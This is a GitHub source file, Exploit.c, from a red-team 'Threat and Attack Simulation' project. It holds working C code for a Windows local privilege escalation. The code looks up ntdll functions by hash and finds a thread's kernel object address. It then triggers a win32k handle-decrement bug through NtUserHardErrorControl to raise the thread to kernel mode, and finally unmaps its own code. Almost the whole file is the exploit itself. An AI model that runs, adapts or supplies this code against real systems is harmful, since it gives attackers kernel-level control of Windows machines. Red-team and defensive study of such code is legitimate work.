forked from benheise/ANGRYORCHARD
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathExploit.c
90 lines (79 loc) · 3.01 KB
/
Exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
/*!
*
* Exploit
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation
*
!*/
#include "Common.h"
typedef struct
{
D_API( NtUnmapViewOfSection );
D_API( RtlExitUserThread );
D_API( RtlCaptureContext );
D_API( NtOpenThread );
D_API( NtContinue );
D_API( NtClose );
} API ;
#define H_API_NTUNMAPVIEWOFSECTION 0x6aa412cd /* NtUnmapViewOfSection */
#define H_API_RTLEXITUSERTHREAD 0x2f6db5e8 /* RtlExitUserThread */
#define H_API_RTLCAPTURECONTEXT 0xeba8d910 /* RtlCaptureContext */
#define H_API_NTOPENTHREAD 0x968e0cb1 /* NtOpenThread */
#define H_API_NTCONTINUE 0xfc3a6c2c /* NtContinue */
#define H_API_NTCLOSE 0x40d6e69d /* NtClose */
#define H_LIB_NTDLL 0x1edab0ed /* ntdll.dll */
/*!
*
* Purpose:
*
* Leverages a arbitrary decrement bug in the way
* win32k accepts handles from Csrss to elevate
* the initial exploit chain thread to KernelMode.
*
!*/
D_SEC( D ) VOID WINAPI ExploitFunction( _In_ PVOID Parameter )
{
API Api;
CONTEXT Ctx;
CLIENT_ID Cid;
OBJECT_ATTRIBUTES Att;
DESKTOPUSEDESKTOP Use;
LPVOID Obj = NULL;
LPVOID Thd = NULL;
RtlSecureZeroMemory( &Api, sizeof( Api ) );
RtlSecureZeroMemory( &Ctx, sizeof( Ctx ) );
RtlSecureZeroMemory( &Cid, sizeof( Cid ) );
RtlSecureZeroMemory( &Att, sizeof( Att ) );
RtlSecureZeroMemory( &Use, sizeof( Use ) );
Api.NtUnmapViewOfSection = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTUNMAPVIEWOFSECTION );
Api.RtlExitUserThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_RTLEXITUSERTHREAD );
Api.RtlCaptureContext = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_RTLCAPTURECONTEXT );
Api.NtOpenThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTOPENTHREAD );
Api.NtContinue = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTCONTINUE );
Api.NtClose = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTCLOSE );
InitializeObjectAttributes( &Att, NULL, 0, NULL, NULL );
Cid.UniqueThread = ( ( PTABLE ) G_PTR( Table ) )->ThreadId;
Cid.UniqueProcess = ( ( PTABLE ) G_PTR( Table ) )->ProcessId;
if ( NT_SUCCESS( Api.NtOpenThread( &Thd, THREAD_ALL_ACCESS, &Att, &Cid ) ) ) {
if ( ( Obj = KernelObjectAddress( Thd ) ) != NULL ) {
if ( NT_SUCCESS( NtUserSetInformationThreadCall( NtCurrentThread(), UserThreadUseDesktop, &Use, sizeof( Use ) ) ) ) {
if ( NtCurrentPeb()->OSBuildNumber >= 9200 ) {
Use.Restore.pDeskRestore = C_PTR( U_PTR( U_PTR( Obj ) + 0x232 ) + 0x30 );
} else {
Use.Restore.pDeskRestore = C_PTR( U_PTR( U_PTR( Obj ) + 0x1f6 ) + 0x30 );
};
NtUserHardErrorControlCall( HardErrorDetachNoQueue, NtCurrentThread(), &Use.Restore );
};
};
Api.NtClose( Thd );
};
Ctx.ContextFlags = CONTEXT_FULL; Api.RtlCaptureContext( &Ctx );
Ctx.Rsp = ( ( Ctx.Rsp &~ ( 0x1000 - 1 ) ) - 0x1000 );
Ctx.Rip = U_PTR( Api.NtUnmapViewOfSection );
Ctx.Rcx = U_PTR( NtCurrentProcess() );
Ctx.Rdx = U_PTR( G_PTR( ExploitFunction ) );
*( ULONG_PTR * )( Ctx.Rsp + 0x0 ) = U_PTR( Api.RtlExitUserThread );
Ctx.ContextFlags = CONTEXT_FULL; Api.NtContinue( &Ctx, FALSE );
};